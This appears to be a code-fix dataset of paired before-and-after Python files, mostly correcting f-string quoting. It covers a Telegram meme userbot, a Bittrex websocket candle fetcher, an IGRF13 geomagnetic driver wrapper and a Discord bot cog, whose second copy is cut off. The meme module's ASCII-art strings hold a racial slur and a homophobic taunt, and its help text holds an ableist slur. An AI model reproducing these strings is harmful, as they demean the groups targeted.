"`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈NIGGA U GEY`"
"\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.gay$")
async def gey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈┈┈╭━━━━━╮┈┈┈┈┈\n┈┈┈┃┊┊┊┊┊┃┈┈┈┈┈`"
"`\n┈┈┈┃┊┊╭━╮┻╮┈┈┈┈\n┈┈┈╱╲┊┃▋┃▋┃┈┈┈┈\n┈┈╭┻┊┊╰━┻━╮┈┈┈┈`"
"`\n┈┈╰┳┊╭━━━┳╯┈┈┈┈\n┈┈┈┃┊┃╰━━┫┈BAPAQ U GAY`"
"\n┈┈┈┈┈┈┏━┓┈┈┈┈┈┈")
@register(outgoing=True, pattern="^.bot$")
async def bot(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("` \n ╲╲╭━━━━╮ \n╭╮┃▆┈┈▆┃╭╮ \n┃╰┫▽▽▽┣╯┃ \n╰━┫△△△┣━╯`"
"`\n╲╲┃┈┈┈┈┃ \n╲╲┃┈┏┓┈┃ `")
@register(outgoing=True, pattern="^.hey$")
async def hey(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("\n┈┈┈╱▔▔▔▔╲┈╭━━━━━\n┈┈▕▂▂▂▂▂▂▏┃HEY!┊😀`"
"`\n┈┈▕▔▇▔▔┳▔▏╰┳╮HEY!┊\n┈┈▕╭━╰╯━╮▏━╯╰━━━\n╱▔▔▏▅▅▅▅▕▔▔╲┈┈┈┈`"
"`\n▏┈┈╲▂▂▂▂╱┈┈┈▏┈┈┈`")
@register(outgoing=True, pattern="^.nou$")
async def nou(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
await e.edit("`\n┈╭╮╭╮\n┈┃┃┃┃\n╭┻┗┻┗╮`"
"`\n┃┈▋┈▋┃\n┃┈╭▋━╮━╮\n┃┈┈╭╰╯╰╯╮`"
"`\n┫┈┈ NoU\n┃┈╰╰━━━━╯`"
"`\n┗━━┻━┛`")
CMD_HELP.update({
"memes":
".cowsay\
\nUsage: cow which says things.\
\n\n:/\
\nUsage: Check yourself ;)\
\n\n-_-\
\nUsage: Ok...\
\n\n;_;\
\nUsage: Like `-_-` but crying.\
\n\n.cp\
\nUsage: Copypasta the famous meme\
\n\n.vapor\
\nUsage: Vaporize everything!\
\n\n.str\
\nUsage: Stretch it.\
\n\n.10iq\
\nUsage: You retard !!\
\n\n.zal\
\nUsage: Invoke the feeling of chaos.\
\n\nOof\
\nUsage: Ooooof\
\n\n.fp\
\nUsage: Facepalm :P\
\n\n.moon\
\nUsage: kensar moon animation.\
\n\n.clock\
\nUsage: kensar clock animation.\
\n\n.hi\
\nUsage: Greet everyone!\
\n\n.coinflip <heads/tails>\
\nUsage: Flip a coin !!\
\n\n.owo\
\nUsage: UwU\
\n\n.react\
\nUsage: Make your userbot react to everything.\
\n\n.slap\
\nUsage: reply to slap them with random objects !!\
\n\n.cry\
\nUsage: y u du dis, i cri.\
\n\n.shg\
\nUsage: Shrug at it !!\
\n\n.run\
\nUsage: Let Me Run, run, RUNNN!\
\n\n.chase\
\nUsage: You better start running\
\n\n.metoo\
\nUsage: Haha yes\
\n\n.mock\
\nUsage: Do it and find the real fun.\
\n\n.clap\
\nUsage: Praise people!\
\n\n.f <emoji/character>\
\nUsage: Pay Respects.\
\n\n.bt\
\nUsage: Believe me, you will find this useful.\
\n\n.type\
\nUsage: Just a small command to make your keyboard become a typewriter!\
\n\n.lfy <query>\
\nUsage: Let me Google that for you real quick !!\
\n\n.decide [Alternates: (.yes, .no, .maybe)]\
\nUsage: Make a quick decision.\
\n\n.scam <action> <time>\
\n[Available Actions: (typing, contact, game, location, voice, round, video, photo, document, cancel)]\
\nUsage: Create fake chat actions, for fun. (Default action: typing)\
\n\n\nThanks to 🅱️ottom🅱️ext🅱️ot (@NotAMemeBot) for some of these."
})
|
# Adapted from Bittrex Python WS client example
#
# Last tested 2020/09/24 on Python 3.8.5
# Note: This file is intended solely for testing purposes and may only be used
# as an example to debug and compare with your code. The 3rd party libraries
# used in this example may not be suitable for your production use cases.
# You should always independently verify the security and suitability of any
# 3rd party library used in your code.
# https://github.com/slazarov/python-signalr-client
import hashlib
import hmac
import json
import logging
import asyncio
import random
import uuid
import redis
from typing import Any, Iterable, NoReturn, Union
from signalr_aio import Connection
from base64 import b64decode
from zlib import decompress, MAX_WBITS
from common.config.constants import (
REDIS_HOST, REDIS_USER,
REDIS_PASSWORD, REDIS_DELIMITER,
DEFAULT_DATETIME_STR_RESULT
)
from common.helpers.datetimehelpers import str_to_milliseconds, redis_time
from fetchers.config.constants import (
WS_SUB_REDIS_KEY, WS_SERVE_REDIS_KEY, WS_SUB_LIST_REDIS_KEY
)
from fetchers.config.queries import MUTUAL_BASE_QUOTE_QUERY
from fetchers.rest.bittrex import BittrexOHLCVFetcher, EXCHANGE_NAME
from fetchers.utils.exceptions import (
ConnectionClosed, UnsuccessfulConnection, InvalidStatusCode
)
URI = 'https://socket-v3.bittrex.com/signalr'
API_KEY = ''
API_SECRET = ''
MAX_SUB_PER_CONN = 200
MAX_SUB_PER_CONN = 25
BACKOFF_MIN_SECS = 2.0
BACKOFF_MAX_SECS = 60.0
class BittrexOHLCVWebsocket:
def __init__(self):
self.redis_client = redis.Redis(
host=REDIS_HOST,
username=REDIS_USER,
password=REDIS_PASSWORD,
decode_responses=True
)
# SignalR hub & asyncio
self.signalr_hub = None
self.asyncio_lock = asyncio.Lock()
self.invocation_event = None
self.invocation_response = None
self.subscription_success = False
# Rest fetcher for convenience
self.rest_fetcher = BittrexOHLCVFetcher()
# Latest timestamp with data
self.latest_ts = None
# Logging
self.logger = logging.getLogger(f'{EXCHANGE_NAME}_websocket')
self.logger.setLevel(logging.INFO)
log_handler = logging.StreamHandler()
log_handler.setLevel(logging.INFO)
log_formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
log_handler.setFormatter(log_formatter)
self.logger.addHandler(log_handler)
# Backoff
self.backoff_delay = BACKOFF_MIN_SECS
async def _connect(self) -> None:
self.latest_ts = redis_time(self.redis_client)
connection = Connection(URI)
self.signalr_hub = connection.register_hub('c3')
connection.received += self.on_message
connection.error += self.on_error
connection.start()
self.logger.info('Connected')
async def _authenticate(self) -> None:
timestamp = str(int(redis_time(self.redis_client)) * 1000)
random_content = str(uuid.uuid4())
content = timestamp + random_content
signed_content = hmac.new(
API_SECRET.encode(), content.encode(), hashlib.sha512).hexdigest()
response = await self._invoke(
'Authenticate',
API_KEY,
timestamp,
random_content,
signed_content
)
if response['Success']:
self.logger.info('Authenticated')
self.signalr_hub.client.on('authenticationExpiring', self.on_auth_expiring)
else:
self.logger.warning('Authentication failed: ' + response['ErrorCode'])
async def _subscribe(self, symbols: Iterable, i: int = 0) -> None:
'''
Subscribes to Bittrex WS for `symbols`
:params:
`symbols` list of symbols
e.g., ['ETH-BTC', 'BTC-EUR']
'''
self.subscription_success = False
# self.signalr_hub.client.on('trade', on_trade)
self.signalr_hub.client.on('heartbeat', self.on_heartbeat)
self.signalr_hub.client.on('candle', self.on_candle)
channels = (
'heartbeat',
# 'candle_BTC-USD_MINUTE_1'
*(f'candle_{symbol}_MINUTE_1' for symbol in symbols)
)
response = await self._invoke('Subscribe', channels)
for c in range(len(channels)):
if response[c]['Success']:
# Only one success is enough to switch to True
self.subscription_success = True
else:
self.logger.error(
f"Group {i}: Subscription to {channels[c]} failed: {response[c]["ErrorCode"]}")
# raise UnsuccessfulConnection // not a good idea to raise here
if self.subscription_success:
self.logger.info(f"Group {i}: Subscription successful")
async def _invoke(self, method: str, *args) -> Union[Any, None]:
async with self.asyncio_lock:
self.invocation_event = asyncio.Event()
self.signalr_hub.server.invoke(method, *args)
await self.invocation_event.wait()
return self.invocation_response
async def on_message(self, **msg) -> None:
if 'R' in msg:
self.invocation_response = msg['R']
self.invocation_event.set()
async def on_error(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
self.logger.warning(msg)
async def on_heartbeat(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
# self.logger.info('\u2661')
async def on_auth_expiring(self, msg) -> None:
self.logger.info('Authentication expiring...')
asyncio.create_task(self._authenticate())
async def on_trade(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
await self.decode_message('Trade', msg)
async def on_candle(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
respj = await self.decode_message('Candle', msg)
# If resp is dict, process and push to Redis
# Convert timestamp to milliseconds first
# for conformity with the WS updater and other exchanges
if isinstance(respj, dict):
try:
symbol = respj['marketSymbol']
ohlcv = respj['delta']
timestamp = str_to_milliseconds(
ohlcv['startsAt'], DEFAULT_DATETIME_STR_RESULT)
open_ = ohlcv['open']
high_ = ohlcv['high']
low_ = ohlcv['low']
close_ = ohlcv['close']
volume_ = ohlcv['volume']
sub_val = f'{timestamp}{REDIS_DELIMITER}{open_}{REDIS_DELIMITER}{high_}{REDIS_DELIMITER}{low_}{REDIS_DELIMITER}{close_}{REDIS_DELIMITER}{volume_}'
# Setting Redis data for updating ohlcv psql db
# and serving real-time chart
# This Redis-update-ohlcv-psql-db-procedure
# may be changed with a pipeline from fastAPI...
base_id = self.rest_fetcher.symbol_data[symbol]['base_id']
quote_id = self.rest_fetcher.symbol_data[symbol]['quote_id']
ws_sub_redis_key = WS_SUB_REDIS_KEY.format(
exchange = EXCHANGE_NAME,
base_id = base_id,
quote_id = quote_id,
delimiter = REDIS_DELIMITER
)
ws_serve_redis_key = WS_SERVE_REDIS_KEY.format(
exchange = EXCHANGE_NAME,
base_id = base_id,
quote_id = quote_id,
delimiter = REDIS_DELIMITER
)
# self.logger.info(f'ws sub redis key: {ws_sub_redis_key}')
# self.logger.info(f'ws serve redis key: {ws_serve_redis_key}')
# Add ws sub key to set of all ws sub keys
# Set hash value for ws sub key
# Replace ws serve key hash if this timestamp
# is more up-to-date
self.redis_client.sadd(
WS_SUB_LIST_REDIS_KEY, ws_sub_redis_key
)
self.redis_client.hset(
ws_sub_redis_key, timestamp, sub_val)
current_timestamp = self.redis_client.hget(
ws_serve_redis_key, 'time')
if current_timestamp is None or \
timestamp >= int(current_timestamp):
self.redis_client.hset(
ws_serve_redis_key,
mapping = {
'time': timestamp,
'open': open_,
'high': high_,
'low': low_,
'close': close_,
'volume': volume_
}
)
except Exception as exc:
self.logger.warning(
f"Bittrex WS Fethcer: EXCEPTION: {exc}")
async def decode_message(self, title, msg) -> None:
decoded_msg = await self.process_message(msg[0])
return decoded_msg
async def process_message(self, message) -> None:
try:
decompressed_msg = decompress(
b64decode(message, validate=True), -MAX_WBITS)
except SyntaxError:
decompressed_msg = decompress(b64decode(message, validate=True))
return json.loads(decompressed_msg.decode())
async def subscribe(self, symbols: Iterable) -> NoReturn:
'''
Subscribes to WS channels of `symbols`
'''
while True:
try:
now = redis_time(self.redis_client)
if self.signalr_hub is None \
or (now - self.latest_ts) > 60 \
or (not self.subscription_success):
await self._connect()
if API_SECRET != '':
await self._authenticate()
else:
self.logger.info('Authentication skipped because API key was not provided')
await self._subscribe(symbols)
# Not sure what kind of exception we will encounter
except (ConnectionClosed, InvalidStatusCode) as exc:
self.logger.warning(
f"Connection raised exception: {exc} - reconnecting..."
)
await asyncio.sleep(min(self.backoff_delay, BACKOFF_MAX_SECS))
self.backoff_delay *= (1+random.random()) # add a random factor
# Sleep to release event loop
await asyncio.sleep(0.01)
async def all(self) -> NoReturn:
self.rest_fetcher.fetch_symbol_data()
symbols = tuple(self.rest_fetcher.symbol_data.keys())
await asyncio.gather(self.subscribe(symbols))
async def mutual_basequote(self) -> NoReturn:
'''
Subscribes to WS channels of the mutual symbols
among all exchanges
'''
symbols_dict = self.rest_fetcher.get_symbols_from_exch(MUTUAL_BASE_QUOTE_QUERY)
await asyncio.gather(self.subscribe(symbols_dict.keys()))
def run_mutual_basequote(self) -> None:
# loop = asyncio.get_event_loop()
# if loop.is_closed():
# asyncio.set_event_loop(asyncio.new_event_loop())
# loop = asyncio.get_event_loop()
# try:
# loop.create_task(self.mutual_basequote())
# loop.run_forever()
# finally:
# loop.close()
asyncio.run(self.mutual_basequote())
def run_all(self) -> None:
asyncio.run(self.all())
| # Adapted from Bittrex Python WS client example
#
# Last tested 2020/09/24 on Python 3.8.5
# Note: This file is intended solely for testing purposes and may only be used
# as an example to debug and compare with your code. The 3rd party libraries
# used in this example may not be suitable for your production use cases.
# You should always independently verify the security and suitability of any
# 3rd party library used in your code.
# https://github.com/slazarov/python-signalr-client
import hashlib
import hmac
import json
import logging
import asyncio
import random
import uuid
import redis
from typing import Any, Iterable, NoReturn, Union
from signalr_aio import Connection
from base64 import b64decode
from zlib import decompress, MAX_WBITS
from common.config.constants import (
REDIS_HOST, REDIS_USER,
REDIS_PASSWORD, REDIS_DELIMITER,
DEFAULT_DATETIME_STR_RESULT
)
from common.helpers.datetimehelpers import str_to_milliseconds, redis_time
from fetchers.config.constants import (
WS_SUB_REDIS_KEY, WS_SERVE_REDIS_KEY, WS_SUB_LIST_REDIS_KEY
)
from fetchers.config.queries import MUTUAL_BASE_QUOTE_QUERY
from fetchers.rest.bittrex import BittrexOHLCVFetcher, EXCHANGE_NAME
from fetchers.utils.exceptions import (
ConnectionClosed, UnsuccessfulConnection, InvalidStatusCode
)
URI = 'https://socket-v3.bittrex.com/signalr'
API_KEY = ''
API_SECRET = ''
MAX_SUB_PER_CONN = 200
MAX_SUB_PER_CONN = 25
BACKOFF_MIN_SECS = 2.0
BACKOFF_MAX_SECS = 60.0
class BittrexOHLCVWebsocket:
def __init__(self):
self.redis_client = redis.Redis(
host=REDIS_HOST,
username=REDIS_USER,
password=REDIS_PASSWORD,
decode_responses=True
)
# SignalR hub & asyncio
self.signalr_hub = None
self.asyncio_lock = asyncio.Lock()
self.invocation_event = None
self.invocation_response = None
self.subscription_success = False
# Rest fetcher for convenience
self.rest_fetcher = BittrexOHLCVFetcher()
# Latest timestamp with data
self.latest_ts = None
# Logging
self.logger = logging.getLogger(f'{EXCHANGE_NAME}_websocket')
self.logger.setLevel(logging.INFO)
log_handler = logging.StreamHandler()
log_handler.setLevel(logging.INFO)
log_formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
log_handler.setFormatter(log_formatter)
self.logger.addHandler(log_handler)
# Backoff
self.backoff_delay = BACKOFF_MIN_SECS
async def _connect(self) -> None:
self.latest_ts = redis_time(self.redis_client)
connection = Connection(URI)
self.signalr_hub = connection.register_hub('c3')
connection.received += self.on_message
connection.error += self.on_error
connection.start()
self.logger.info('Connected')
async def _authenticate(self) -> None:
timestamp = str(int(redis_time(self.redis_client)) * 1000)
random_content = str(uuid.uuid4())
content = timestamp + random_content
signed_content = hmac.new(
API_SECRET.encode(), content.encode(), hashlib.sha512).hexdigest()
response = await self._invoke(
'Authenticate',
API_KEY,
timestamp,
random_content,
signed_content
)
if response['Success']:
self.logger.info('Authenticated')
self.signalr_hub.client.on('authenticationExpiring', self.on_auth_expiring)
else:
self.logger.warning('Authentication failed: ' + response['ErrorCode'])
async def _subscribe(self, symbols: Iterable, i: int = 0) -> None:
'''
Subscribes to Bittrex WS for `symbols`
:params:
`symbols` list of symbols
e.g., ['ETH-BTC', 'BTC-EUR']
'''
self.subscription_success = False
# self.signalr_hub.client.on('trade', on_trade)
self.signalr_hub.client.on('heartbeat', self.on_heartbeat)
self.signalr_hub.client.on('candle', self.on_candle)
channels = (
'heartbeat',
# 'candle_BTC-USD_MINUTE_1'
*(f'candle_{symbol}_MINUTE_1' for symbol in symbols)
)
response = await self._invoke('Subscribe', channels)
for c in range(len(channels)):
if response[c]['Success']:
# Only one success is enough to switch to True
self.subscription_success = True
else:
self.logger.error(
f"Group {i}: Subscription to {channels[c]} failed: {response[c]['ErrorCode']}")
# raise UnsuccessfulConnection // not a good idea to raise here
if self.subscription_success:
self.logger.info(f"Group {i}: Subscription successful")
async def _invoke(self, method: str, *args) -> Union[Any, None]:
async with self.asyncio_lock:
self.invocation_event = asyncio.Event()
self.signalr_hub.server.invoke(method, *args)
await self.invocation_event.wait()
return self.invocation_response
async def on_message(self, **msg) -> None:
if 'R' in msg:
self.invocation_response = msg['R']
self.invocation_event.set()
async def on_error(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
self.logger.warning(msg)
async def on_heartbeat(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
# self.logger.info('\u2661')
async def on_auth_expiring(self, msg) -> None:
self.logger.info('Authentication expiring...')
asyncio.create_task(self._authenticate())
async def on_trade(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
await self.decode_message('Trade', msg)
async def on_candle(self, msg) -> None:
self.latest_ts = redis_time(self.redis_client)
respj = await self.decode_message('Candle', msg)
# If resp is dict, process and push to Redis
# Convert timestamp to milliseconds first
# for conformity with the WS updater and other exchanges
if isinstance(respj, dict):
try:
symbol = respj['marketSymbol']
ohlcv = respj['delta']
timestamp = str_to_milliseconds(
ohlcv['startsAt'], DEFAULT_DATETIME_STR_RESULT)
open_ = ohlcv['open']
high_ = ohlcv['high']
low_ = ohlcv['low']
close_ = ohlcv['close']
volume_ = ohlcv['volume']
sub_val = f'{timestamp}{REDIS_DELIMITER}{open_}{REDIS_DELIMITER}{high_}{REDIS_DELIMITER}{low_}{REDIS_DELIMITER}{close_}{REDIS_DELIMITER}{volume_}'
# Setting Redis data for updating ohlcv psql db
# and serving real-time chart
# This Redis-update-ohlcv-psql-db-procedure
# may be changed with a pipeline from fastAPI...
base_id = self.rest_fetcher.symbol_data[symbol]['base_id']
quote_id = self.rest_fetcher.symbol_data[symbol]['quote_id']
ws_sub_redis_key = WS_SUB_REDIS_KEY.format(
exchange = EXCHANGE_NAME,
base_id = base_id,
quote_id = quote_id,
delimiter = REDIS_DELIMITER
)
ws_serve_redis_key = WS_SERVE_REDIS_KEY.format(
exchange = EXCHANGE_NAME,
base_id = base_id,
quote_id = quote_id,
delimiter = REDIS_DELIMITER
)
# self.logger.info(f'ws sub redis key: {ws_sub_redis_key}')
# self.logger.info(f'ws serve redis key: {ws_serve_redis_key}')
# Add ws sub key to set of all ws sub keys
# Set hash value for ws sub key
# Replace ws serve key hash if this timestamp
# is more up-to-date
self.redis_client.sadd(
WS_SUB_LIST_REDIS_KEY, ws_sub_redis_key
)
self.redis_client.hset(
ws_sub_redis_key, timestamp, sub_val)
current_timestamp = self.redis_client.hget(
ws_serve_redis_key, 'time')
if current_timestamp is None or \
timestamp >= int(current_timestamp):
self.redis_client.hset(
ws_serve_redis_key,
mapping = {
'time': timestamp,
'open': open_,
'high': high_,
'low': low_,
'close': close_,
'volume': volume_
}
)
except Exception as exc:
self.logger.warning(
f"Bittrex WS Fethcer: EXCEPTION: {exc}")
async def decode_message(self, title, msg) -> None:
decoded_msg = await self.process_message(msg[0])
return decoded_msg
async def process_message(self, message) -> None:
try:
decompressed_msg = decompress(
b64decode(message, validate=True), -MAX_WBITS)
except SyntaxError:
decompressed_msg = decompress(b64decode(message, validate=True))
return json.loads(decompressed_msg.decode())
async def subscribe(self, symbols: Iterable) -> NoReturn:
'''
Subscribes to WS channels of `symbols`
'''
while True:
try:
now = redis_time(self.redis_client)
if self.signalr_hub is None \
or (now - self.latest_ts) > 60 \
or (not self.subscription_success):
await self._connect()
if API_SECRET != '':
await self._authenticate()
else:
self.logger.info('Authentication skipped because API key was not provided')
await self._subscribe(symbols)
# Not sure what kind of exception we will encounter
except (ConnectionClosed, InvalidStatusCode) as exc:
self.logger.warning(
f"Connection raised exception: {exc} - reconnecting..."
)
await asyncio.sleep(min(self.backoff_delay, BACKOFF_MAX_SECS))
self.backoff_delay *= (1+random.random()) # add a random factor
# Sleep to release event loop
await asyncio.sleep(0.01)
async def all(self) -> NoReturn:
self.rest_fetcher.fetch_symbol_data()
symbols = tuple(self.rest_fetcher.symbol_data.keys())
await asyncio.gather(self.subscribe(symbols))
async def mutual_basequote(self) -> NoReturn:
'''
Subscribes to WS channels of the mutual symbols
among all exchanges
'''
symbols_dict = self.rest_fetcher.get_symbols_from_exch(MUTUAL_BASE_QUOTE_QUERY)
await asyncio.gather(self.subscribe(symbols_dict.keys()))
def run_mutual_basequote(self) -> None:
# loop = asyncio.get_event_loop()
# if loop.is_closed():
# asyncio.set_event_loop(asyncio.new_event_loop())
# loop = asyncio.get_event_loop()
# try:
# loop.create_task(self.mutual_basequote())
# loop.run_forever()
# finally:
# loop.close()
asyncio.run(self.mutual_basequote())
def run_all(self) -> None:
asyncio.run(self.all())
|
import xarray
from datetime import datetime
import numpy as np
import subprocess
import shutil
import os
from pathlib import Path
import importlib.resources
from .utils import mag_vector2incl_decl, datetime2yeardec
def cmake(setup_file: Path):
"""
attempt to build using CMake
"""
exe = shutil.which("ctest")
if not exe:
raise FileNotFoundError("CMake not available")
subprocess.check_call([exe, "-S", str(setup_file), "-VV"])
def build_exe(exe_name: str) -> str:
# build on run
if os.name == "nt":
exe_name += ".exe"
if not importlib.resources.is_resource(__package__, exe_name):
with importlib.resources.path(__package__, "setup.cmake") as setup_file:
cmake(setup_file)
if not importlib.resources.is_resource(__package__, exe_name):
raise ModuleNotFoundError("could not build MSISE00 Fortran driver")
return exe_name
def grid(
time: datetime,
glat: np.ndarray,
glon: np.ndarray,
alt_km: np.ndarray,
*,
isv: int = 0,
itype: int = 1,
) -> xarray.Dataset:
glat = np.atleast_1d(glat)
glon = np.atleast_1d(glon)
yeardec = datetime2yeardec(time)
x = np.empty(glat.size)
y = np.empty_like(x)
z = np.empty_like(x)
f = np.empty_like(x)
with importlib.resources.path(__package__, build_exe("igrf13_driver")) as exe:
for i, (la, lo) in enumerate(zip(glat.ravel(), glon.ravel())):
cmd = [str(exe), str(yeardec), str(la), str(lo), str(alt_km), str(isv), str(itype)]
ret = subprocess.run(
cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
if ret.returncode != 0:
raise RuntimeError(
f"IGRF13 error code {ret.returncode}\n{ret.stderr}\n{" ".join(cmd)}"
)
# different compilers throw in extra \n
x[i], y[i], z[i], f[i] = list(map(float, ret.stdout.split()))
# %% assemble output
if glat.ndim == 2 and glon.ndim == 2: # assume meshgrid
coords = {"glat": glat[:, 0], "glon": glon[0, :]}
elif glat.ndim == 1 and glon.ndim == 1:
coords = {"glat": glat, "glon": glon}
else:
raise ValueError(f"glat/glon shapes: {glat.shape} {glon.shape}")
mag = xarray.Dataset(coords=coords, attrs={"time": time, "isv": isv, "itype": itype})
mag["north"] = (("glat", "glon"), x.reshape(glat.shape))
mag["east"] = (("glat", "glon"), y.reshape(glat.shape))
mag["down"] = (("glat", "glon"), z.reshape(glat.shape))
mag["total"] = (("glat", "glon"), f.reshape(glat.shape))
decl, incl = mag_vector2incl_decl(mag.north, mag.east, mag.down)
mag["incl"] = (("glat", "glon"), incl)
mag["decl"] = (("glat", "glon"), decl)
return mag
def igrf(
time: datetime, glat: float, glon: float, alt_km: np.ndarray, *, isv: int = 0, itype: int = 1,
) -> xarray.Dataset:
"""
Parameters
----------
date: datetime.date or decimal year yyyy.dddd
glat, glon: geographic Latitude, Longitude
alt_km: altitude [km] above sea level for itype==1
isv: 0 for main geomagnetic field
itype: 1: altitude is above sea level
"""
# decimal year
yeardec = datetime2yeardec(time)
alt_km = np.atleast_1d(alt_km)
Bnorth = np.empty(alt_km.size)
Beast = np.empty_like(Bnorth)
Bvert = np.empty_like(Bnorth)
Btotal = np.empty_like(Bnorth)
with importlib.resources.path(__package__, build_exe("igrf13_driver")) as exe:
for i, a in enumerate(alt_km):
cmd = [str(exe), str(yeardec), str(glat), str(glon), str(a), str(isv), str(itype)]
ret = subprocess.run(
cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
if ret.returncode != 0:
raise RuntimeError(
f"IGRF13 error code {ret.returncode}\n{ret.stderr}\n{" ".join(cmd)}"
)
# different compilers throw in extra \n
Bnorth[i], Beast[i], Bvert[i], Btotal[i] = list(map(float, ret.stdout.split()))
# %% assemble output
decl, incl = mag_vector2incl_decl(Bnorth, Beast, Bvert)
mag = xarray.Dataset(
{
"north": ("alt_km", Bnorth),
"east": ("alt_km", Beast),
"down": ("alt_km", Bvert),
"total": ("alt_km", Btotal),
"incl": ("alt_km", incl),
"decl": ("alt_km", decl),
},
coords={"alt_km": alt_km},
attrs={"time": time, "isv": isv, "itype": itype, "glat": glat, "glon": glon},
)
return mag
| import xarray
from datetime import datetime
import numpy as np
import subprocess
import shutil
import os
from pathlib import Path
import importlib.resources
from .utils import mag_vector2incl_decl, datetime2yeardec
def cmake(setup_file: Path):
"""
attempt to build using CMake
"""
exe = shutil.which("ctest")
if not exe:
raise FileNotFoundError("CMake not available")
subprocess.check_call([exe, "-S", str(setup_file), "-VV"])
def build_exe(exe_name: str) -> str:
# build on run
if os.name == "nt":
exe_name += ".exe"
if not importlib.resources.is_resource(__package__, exe_name):
with importlib.resources.path(__package__, "setup.cmake") as setup_file:
cmake(setup_file)
if not importlib.resources.is_resource(__package__, exe_name):
raise ModuleNotFoundError("could not build MSISE00 Fortran driver")
return exe_name
def grid(
time: datetime,
glat: np.ndarray,
glon: np.ndarray,
alt_km: np.ndarray,
*,
isv: int = 0,
itype: int = 1,
) -> xarray.Dataset:
glat = np.atleast_1d(glat)
glon = np.atleast_1d(glon)
yeardec = datetime2yeardec(time)
x = np.empty(glat.size)
y = np.empty_like(x)
z = np.empty_like(x)
f = np.empty_like(x)
with importlib.resources.path(__package__, build_exe("igrf13_driver")) as exe:
for i, (la, lo) in enumerate(zip(glat.ravel(), glon.ravel())):
cmd = [str(exe), str(yeardec), str(la), str(lo), str(alt_km), str(isv), str(itype)]
ret = subprocess.run(
cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
if ret.returncode != 0:
raise RuntimeError(
f"IGRF13 error code {ret.returncode}\n{ret.stderr}\n{' '.join(cmd)}"
)
# different compilers throw in extra \n
x[i], y[i], z[i], f[i] = list(map(float, ret.stdout.split()))
# %% assemble output
if glat.ndim == 2 and glon.ndim == 2: # assume meshgrid
coords = {"glat": glat[:, 0], "glon": glon[0, :]}
elif glat.ndim == 1 and glon.ndim == 1:
coords = {"glat": glat, "glon": glon}
else:
raise ValueError(f"glat/glon shapes: {glat.shape} {glon.shape}")
mag = xarray.Dataset(coords=coords, attrs={"time": time, "isv": isv, "itype": itype})
mag["north"] = (("glat", "glon"), x.reshape(glat.shape))
mag["east"] = (("glat", "glon"), y.reshape(glat.shape))
mag["down"] = (("glat", "glon"), z.reshape(glat.shape))
mag["total"] = (("glat", "glon"), f.reshape(glat.shape))
decl, incl = mag_vector2incl_decl(mag.north, mag.east, mag.down)
mag["incl"] = (("glat", "glon"), incl)
mag["decl"] = (("glat", "glon"), decl)
return mag
def igrf(
time: datetime, glat: float, glon: float, alt_km: np.ndarray, *, isv: int = 0, itype: int = 1,
) -> xarray.Dataset:
"""
Parameters
----------
date: datetime.date or decimal year yyyy.dddd
glat, glon: geographic Latitude, Longitude
alt_km: altitude [km] above sea level for itype==1
isv: 0 for main geomagnetic field
itype: 1: altitude is above sea level
"""
# decimal year
yeardec = datetime2yeardec(time)
alt_km = np.atleast_1d(alt_km)
Bnorth = np.empty(alt_km.size)
Beast = np.empty_like(Bnorth)
Bvert = np.empty_like(Bnorth)
Btotal = np.empty_like(Bnorth)
with importlib.resources.path(__package__, build_exe("igrf13_driver")) as exe:
for i, a in enumerate(alt_km):
cmd = [str(exe), str(yeardec), str(glat), str(glon), str(a), str(isv), str(itype)]
ret = subprocess.run(
cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
if ret.returncode != 0:
raise RuntimeError(
f"IGRF13 error code {ret.returncode}\n{ret.stderr}\n{' '.join(cmd)}"
)
# different compilers throw in extra \n
Bnorth[i], Beast[i], Bvert[i], Btotal[i] = list(map(float, ret.stdout.split()))
# %% assemble output
decl, incl = mag_vector2incl_decl(Bnorth, Beast, Bvert)
mag = xarray.Dataset(
{
"north": ("alt_km", Bnorth),
"east": ("alt_km", Beast),
"down": ("alt_km", Bvert),
"total": ("alt_km", Btotal),
"incl": ("alt_km", incl),
"decl": ("alt_km", decl),
},
coords={"alt_km": alt_km},
attrs={"time": time, "isv": isv, "itype": itype, "glat": glat, "glon": glon},
)
return mag
|
from discord.ext import commands
import datetime
from discord.ext.commands.errors import MissingRequiredArgument, CommandNotFound
class Manager(commands.Cog):
""" Manage the bot """
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
print(f'Estamos conectados como {self.bot.user}')
now = datetime.datetime.now()
print(f'Conexão iniciada: {now.strftime('%d/%m/%Y às %H:%M:%S')}')
print('>' + '-'*34 + '<')
@commands.Cog.listener()
async def on_message(self, message):
if message.author == self.bot.user:
return
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
if isinstance(error, MissingRequiredArgument):
await ctx.send("Favor enviar todos os Argumentos. Digite \\help para ver os parâmetros de cada comando")
elif isinstance(error, CommandNotFound):
await ctx.send("O comando não existe. Digite \\help para ver todos os comandos")
else:
raise error
def setup(bot):
bot.add_cog(Manager(bot))
| from discord.ext import commands
import datetime
from discord.ext.commands.errors import MissingRequiredArgument, CommandNotFound
class Manager(commands.Cog):
""" Manage the bot """
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
print(f'Estamos conectados como {self.bot.user}')
now = datetime.datetime.now()
